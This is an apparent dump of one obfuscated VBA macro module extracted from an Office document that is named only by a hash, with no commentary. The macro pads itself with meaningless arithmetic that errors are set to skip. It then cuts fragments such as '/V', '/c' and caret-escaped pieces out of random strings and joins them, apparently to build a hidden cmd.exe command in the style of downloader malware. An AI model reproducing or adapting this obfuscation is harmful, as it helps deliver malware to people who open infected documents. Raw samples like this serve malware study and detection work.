Filename     : ./macros/166cc63d54e618bf8e1fa4d2d2be309ad7ab7f539875321bb72934317dcd53d9
OLE stream   : Macros/VBA/NRffFAuqn
VBA filename : NRffFAuqn.bas
----------------------------------------
Attribute VB_Name = "NRffFAuqn"
Sub WzwpQoRkp()
   On Error Resume Next
   tkSdihITRjJDF = (uBWZiDplinYud / ChrB(5821610) - NIDBGTdwCAXsa - 4906815) * (1316663 + 2775988 + (3589150 / Rnd(FuPRrBlAHFfFj * ChrB(739692 * CByte(bDXFBzaRCU)) - KLOMXYFCY - Atn(6819470)) * wQBQFLYTwQ + 3821040))
   wWjIQsi = 5682866 / Atn(wSqZmvh) / (1215339 - hfuzG / 1355630 - Sqr(ltPti * CStr(IrzPqoPoK / Sgn(8803918 - CDate(1136610 / zzKqTPq * 2586060 * Sqr(joTzPcEfzPkiZK))))) + (cWFtqLXlojHJtv - 5041173 / 9836711 / CLng(591153)))
End Sub
Function QmljvhmpqmBWd()
On Error Resume Next
rwHTF = "wSvmbZEfHYRwf cJIaavHLazmOKaMMqCjDNYBOotCf"
sqMdN = LpJsDNwTo = 2419008 / Atn(JmpFKKMckjmuQ) / (4048359 - jfsVnqfE / 2187329 - Sqr(WbRUiIclMGz * CStr(pRHErcoYvt / Sgn(4533741 - CDate(7692761 / TbTYAihiZn * 6791954 * Sqr(IBXJJDOPFqaNjw))))) + (PmldD - 5695051 / 8092858 / CLng(3020587)))
CkHqXwt = JMMcRzQiXJj = 5090737 / Atn(PmpJYYcA) / (987725 - BbSrnKfRSmqzw / 8323191 - Sqr(zGZwqaPcwXzn * CStr(FRnjEWKAzHcTs / Sgn(8345030 - CDate(3242809 / bPpwXaRCDPPl * 9791118 * Sqr(ToWlMAwJ))))) + (ajlwwzdziwoXIJ - 7876252 / 4343273 / CLng(6002611)))
OXWTfqHinb = EBhwniEpW + hnasd(rwHTF, 10, 12)
UEZOsEIDza = "zZsCzEWTLNdZozsufXMTlNVjK            /V        WizboAVNjBFoVK"
NbzNpN = XkKidSjchsVsh = 6641364 / Atn(RzFSX) / (3711665 - wMjsZiJww / 6541425 - Sqr(uEYEMUzqJh * CStr(pLdZv / Sgn(5511665 - CDate(5086603 / loXzmwwlt * 173741 * Sqr(ivnNmdbN))))) + (lUjJruWVPAnj - 4639147 / 4845798 / CLng(9260361)))
mzDJwXjHiMr = XGmFOiEqpwHCz = 8192365 / Atn(UPnmQHNGrbcWtN) / (7557959 - WrWPWpH / 4544424 - Sqr(QqTtn * CStr(XYETRkmf / Sgn(6850878 - CDate(1882450 / udmML * 5440389 * Sqr(okLba))))) + (iHQjAQtME - 1375964 / 930042 / CLng(9630513)))
QWRoLCl = kdpHZ + hnasd(UEZOsEIDza, 26, 22)
jTdwEY = "cqYC  %C^mOZtYfjTGmKwC"
NhlXPAFtkM = HUTVfUcV = 5275419 / Atn(LUrSBnBX) / (6158494 - jRWvB / 280608 - Sqr(UjiPV * CStr(Rijqlz / Sgn(1577659 - CDate(5619918 / NuZwzMk * 7053327 * Sqr(phanqwXTd))))) + (ImwBqPZk - 3959019 / 9468194 / CLng(3197251)))
vLDYi = XXVEbWEEqj = 9708048 / Atn(Znidri) / (3737039 - TqUZQtih / 4469578 - Sqr(QnGPJDSlWA * CStr(ZbZnobC / Sgn(6989681 - CDate(9197972 / mdzGhCvninWhN * 3613502 * Sqr(CJdbLFL))))) + (CuOvlcRf - 9528004 / 5271605 / CLng(6938129)))
UudvJiYb = uWajLmFWvilq + hnasd(jTdwEY, 5, 5)
DhEcTnSdV = "TAkQTS &  wfvTswmwhOnffD"
Loiolf = hEvSAsYorcK = 3796057 / Atn(EhXEhY) / (1126858 - hERLDGu / 8658465 - Sqr(uUUjT * CStr(SNkKMNzCTzt / Sgn(9150169 - CDate(2000623 / KqJuRzAiGzmdv * 7989494 * Sqr(pzWkAFrwNtB))))) + (BwLKKjArEKa - 3421765 / 3822932 / CLng(6210019)))
uCfjqclOr = HmXjSJUdAWLJ = 7584600 / Atn(tvBQRwfu) / (7497624 - tuwifZEQUQ / 6923830 - Sqr(pJjZhV * CStr(nzaNXLP / Sgn(4810925 - CDate(276730 / hJMzw * 7945512 * Sqr(LpwaRupWj))))) + (FrhrQJjzcTh - 5134686 / 3677587 / CLng(3012618)))
QTIcYwk = JGJcBWwoNs + hnasd(DhEcTnSdV, 7, 4)
JJtAoS = "IYlUsBTGmKiErokJpSNnLuTjzL /c          AukYC"
GiKbpch = cHfdjHRPlXw = 116769 / Atn(znXzw) / (3335537 - oIHjVdu / 2871280 - Sqr(iKYfpMDbuCSJ * CStr(MnAjoOszwpjl / Sgn(8296276 - CDate(3920216 / wHDMD * 5402931 * Sqr(MZUOlj))))) + (EwwCBwTippfWoh - 4167189 / 8556361 / CLng(8804631)))
AkUmLEDJ = rDimzFGLEabLZd = 1712530 / Atn(rshjq) / (4684205 - NSOjjnZrhbQ / 8849550 - Sqr(RSztvprsHdP * CStr(NlpdK / Sgn(1916314 - CDate(1572189 / WRUkYZXf * 6824228 * Sqr(kJjclZvooAhoF))))) + (wiSCjOWRHaKz - 9630388 / 2390344 / CLng(3983926)))
iLUrlZf = DNmHX + hnasd(JJtAoS, 27, 13)
IoLzBilLGF = "jfXmDCzAjVjLjHvBOaAqEWruJOWzAIaWuXuDAKEN"
zJEzVdsKA = UhhqpjnwRC = 508345 / Atn(bPjqKzpLJQQDj) / (1915115 - wIcjawPdbb / 474407 - Sqr(ERtlSmI * CStr(azplrlLQERdG / Sgn(5982045 - CDate(816935 / qoVbuMmEPHlk * 8883776 * Sqr(fzRbWBBS))))) + (opkzYKwvjAcDw - 9448808 / 2036084 / CLng(2803581)))
AwZfrPkkia = ntaiGARAYT = 2236383 / Atn(ICnXwjmJNNt) / (3382313 - BkRNjAG / 2393692 - Sqr(NHsMhoTwArmQaz * CStr(fwQYENazISFQ / Sgn(49624 - CDate(7470582 / TETNojflzwqON * 470664 * Sqr(vamcilkiHh))))) + (HjucXSMKYhwN - 1701653 / 1729362 / CLng(9863670)))
EHfRI = SLINtFTkz + hnasd(IoLzBilLGF, 22, 2)
cBrDwJYdEjZ = "SUcaFPZJDzLAaObXJEjCPXrNjDrQcDTYInEFKDjHztKYqYRRWVwTib"
wVpmtDjaZ = ZzSjhWLAVS = 2547915 / Atn(NduIm) / (5782967 - parCPNKWR / 3577197 - Sqr(nmJWPlvwoLUEC * CStr(piCNistPUvzhw / Sgn(590893 - CDate(4138894 / AuhcfasrN * 1724725 * Sqr(ppKVWoL))))) + (iHImazXSO - 4338959 / 6542893 / CLng(7933003)))
wYzqw = aRLaWZMPqKAVi = 754913 / Atn(KactldqPrH) / (1467629 - HHiVfTUOXw / 9107236 - Sqr(OzKoz * CStr(QvvzIn / Sgn(8785726 - CDate(7816284 / PkCUS * 2791031 * Sqr(EHMpUCKpCLicil))))) + (CSiqMiJw - 8083538 / 5280373 / CLng(8276437)))
GvIiH = RZOzNzd + hnasd(cBrDwJYdEjZ, 27, 15)
JzpBPjzYE = "mSfwCrom^S^pEc%sjUzSEESFPzKi"
kVkGZnj = oKACIUUlQp = 2858329 / Atn(lhPaHUrlJnJI) / (9912744 - EdWQUNUSZmo / 9494306 - Sqr(lVlEbUNJzmLROq * CStr(TABsCbQqPAU / Sgn(251252 - CDate(3443233 / HcmKWGPX * 6840348 * Sqr(omYFrKwGWlz))))) + (lwuXVfWEG - 3617122 / 9057995 / CLng(8187700)))
HJtZUtkB = JZHskTwQTDQDL = 9823606 / Atn(CNijT) / (6609728 - qPzkkAfaVrhNi / 7263221 - Sqr(OlSCIRsdTKjSB * CStr(oOXIRjssAivls / Sgn(6565553 - CDate(4811240 / zQSLzsNQZ * 4916985 * Sqr(lfaEidhhcKEQCw))))) + (ljHXYKEwM - 2954570 / 13079 / CLng(8082836)))
frGZORSsmT = FiUidmS + hnasd(JzpBPjzYE, 7, 9)
wSOpsvwOfWr = "JQJMEhBlwkYFzRZvcmd bJutNhivjtB zlHsljPlnlnjKcYoA"
nZMvB = Nvrunjzm = 7349158 / Atn(urzhtF) / (3721136 - nTPhI / 9448059 - Sqr(PAhviDtz * CStr(CrujkN / Sgn(9236360 - CDate(7536495 / FiGIZvb * 126241 * Sqr(ofAfmuiY))))) + (PrICAunfBK - 6947702 / 3083953 / CLng(4980570)))
wiPHf = bWDSJHblU = 5671307 / Atn(ERIWFzEMijwD) / (396600 - LUuuQQBOIY / 1783194 - Sqr(cUQDiWiRwcf * CStr(vLfDrq / Sgn(6122357 - CDate(3695529 / oznhr * 842346 * Sqr(jpIjNXX))))) + (viCZYkhiolw - 1023592 / 7099236 / CLng(9670197)))
vLCFEvuiJ = vAGjslGNaiNHK + hnasd(wSOpsvwOfWr, 17, 17)
QfDLw = "pjLLQYcJHrwInuzqKhlrbCRCfDXbloiTIhH"
KjCnd = MFBFDoIBDHaUa = 7187040 / Atn(BiOAz) / (1126804 - iCVDJ / 4171356 - Sqr(qNQoaU * CStr(tDKPTawwMOu / Sgn(699055 - CDate(2909396 / JXnTmJ * 5225366 * Sqr(jAfmuMtKfAQVHb))))) + (lifFh - 7963877 / 1456184 / CLng(1652772)))
HVKHrvM = GAjqcU = 7623793 / Atn(GtTKjjf) / (7145329 - Cjumu / 9741754 - Sqr(TCpHEtKcraj * CStr(jDiKMFONHtCzz / Sgn(3883059 - CDate(5859497 / YOSMBzWafjHM * 6911076 * Sqr(SJAlEzUYhhfkb))))) + (zrHjPWDdHT - 8634205 / 6794207 / CLng(6500659)))
dPJKrpopJp = RsqjoWdWm + hnasd(QfDLw, 6, 3)
jaJphL = "maGCiJSJqkfNCDQ %C^oYCdRMLpqhjYzmRd"
EvjaCZjEs = QViSDpMzZXrHrt = 2590581 / Atn(GmiaEmtfT) / (4986722 - GPLdrKmcJLz / 865079 - Sqr(SCTlhitTAHOmn * CStr(sicDzdFFk / Sgn(2738308 - CDate(8762971 / zERDLJisHCSHzk * 6309743 * Sqr(GIzrEouz))))) + (IzbjNRFrhlo - 490600 / 9332377 / CLng(9213512)))
RqDfhmtd = EuOpM = 3890942 / Atn(OwqwcR) / (429936 - IJTWDLHIukMQQz / 8432695 - Sqr(JMsnJZE * CStr(NCiitOpopmcf / Sgn(6743147 - CDate(5040965 / twlUEzEpPEdpQ * 4829805 * Sqr(ljEhIAc))))) + (PfvXadXMij - 3710418 / 9801451 / CLng(8140943)))
zjFEsHaDwQ = fjwCdP + hnasd(jaJphL, 16, 5)
WCinjtV = "FAEPbqjm^S^pEc%     wzzKIHsMVWJD"
wSzAzEwA = QRYBVbDiiBqD = 3225945 / Atn(cuhHzwi) / (9929738 - RzTZzp / 9259606 - Sqr(AizzozlzPwjjNw * CStr(VTsnElVz / Sgn(1595135 - CDate(3202062 / GDCCGpm * 1002995 * Sqr(YSQnwvHiAwTs))))) + (hwFFCrLfi - 7997244 / 6324947 / CLng(5744609)))
EIPAizHV = izNsquIHrCDEq = 1663082 / Atn(mzKzSlWEwA) / (7469325 - uKudjJFNJVHHZ / 6945883 - Sqr(pvCBMjh * CStr(ifjLGMsQsDzOz / Sgn(9418365 - CDate(4801371 / ulvURsCX * 6580089 * Sqr(jItzaLNRP))))) + (zwwAREPDZVQsWi - 1238457 / 5196221 / CLng(7640210)))
SvYDGzjcrd = EzlJNTaQZ + hnasd(WCinjtV, 8, 13)
oXcdluW = "lswBSqpSorvXtSztKI zDzqaAr"
TYCEn = hRTnjCFAZIQ = 1410107 / Atn(RSmKKjP) / (1107231 - kzmLlcsXX / 3903701 - Sqr(PBtKD * CStr(RlaiiLbGEihJmY / Sgn(4884597 - CDate(5408742 / hWAVRd * 1361634 * Sqr(kwFzQ))))) + (bHNSiftGl - 2065047 / 817586 / CLng(6203139)))
cKlHhaO = LNkwcnrMoCcAIT = 5501484 / Atn(PWHoFFCZFvwQa) / (7055403 - QlfvoAzdLZMnF / 7088958 - Sqr(VLQNVowr * CStr(FKKqjqalDLLPd / Sgn(4523477 - CDate(7788539 / PsvPsSzooZlzN * 2849178 * Sqr(Utmqd))))) + (JzVwajtZCsoc - 3943243 / 1156857 / CLng(9327631)))
HzCTiA = amdLdjj + hnasd(oXcdluW, 19, 1)
RVKnuidDY = "mmVBpzZvKcmK  YUcXoasZzYUzssu"
VmVOjj = RQQnaMtT = 9626005 / Atn(WBcww) / (5635796 - XInCauYsTcjK / 7017520 - Sqr(IGdopjTmiXoVR * CStr(bjiCBjKsJOrVr / Sgn(9064649 - CDate(1316571 / NINKOvzJGuU * 7092316 * Sqr(PNFdjQkwiJ))))) + (jQwPz - 3886064 / 8344783 / CLng(4740845)))
RJzCDcJM = uKfHGdjkUvH = 2341277 / Atn(OtAmrLiWl) / (6729456 - KazwjMmCwFjFhz / 4401853 - Sqr(kzdiC * CStr(KCCPLcjtIJbhz / Sgn(6248001 - CDate(6117035 / AIIEQTfoSoU * 1520186 * Sqr(XHAwSPvvUAKWC))))) + (ZdAzqXCzVZwbqX - 2778842 / 9326457 / CLng(4327572)))
kzNjYbVY = czmNV + hnasd(RVKnuidDY, 13, 2)
QmljvhmpqmBWd = vLCFEvuiJ + GvIiH + dPJKrpopJp + EHfRI + OXWTfqHinb + QTIcYwk + kzNjYbVY + zjFEsHaDwQ + SvYDGzjcrd + UudvJiYb + frGZORSsmT + QWRoLCl + iLUrlZf + HzCTiA
HYzlCakfQ = mfHwhNWFKRp = 5872972 / Atn(sXlbzrZYhYiC) / (9596545 - LXCQU / 4942303 - Sqr(QTOaQNTRDihc * CStr(GNQzmnrMFHcv / Sgn(6922382 - CDate(2064948 / hHBUEzc * 812895 * Sqr(AhdFGdtzZ))))) + (wwHCdj - 6548429 / 5120733 / CLng(2131253)))
MlijCIjvd = YqiJszF = 1896265 / Atn(GbNfWZONaEYn) / (4382246 - RrlVAbwWh / 3169757 - Sqr(BTRoODXXvUj * CStr(FIGovJrEZBTNRH / Sgn(5773972 - CDate(886846 / pjuwvUGwYMB * 200549 * Sqr(bChsfMum))))) + (MqLKA - 130784 / 931549 / CLng(4461310)))
GZSoFkpCK = ArXzpDIaQfZb = 3314554 / Atn(woWDlk) / (3769749 - rBFcic / 4150014 - Sqr(sqVYuuiP * CStr(ICakZ / Sgn(9623373 - CDate(6037900 / IsQNlR * 4920028 * Sqr(uAVrNVjEw))))) + (iFtQBKGDcitV - 3466780 / 595776 / CLng(4990470)))
End Function
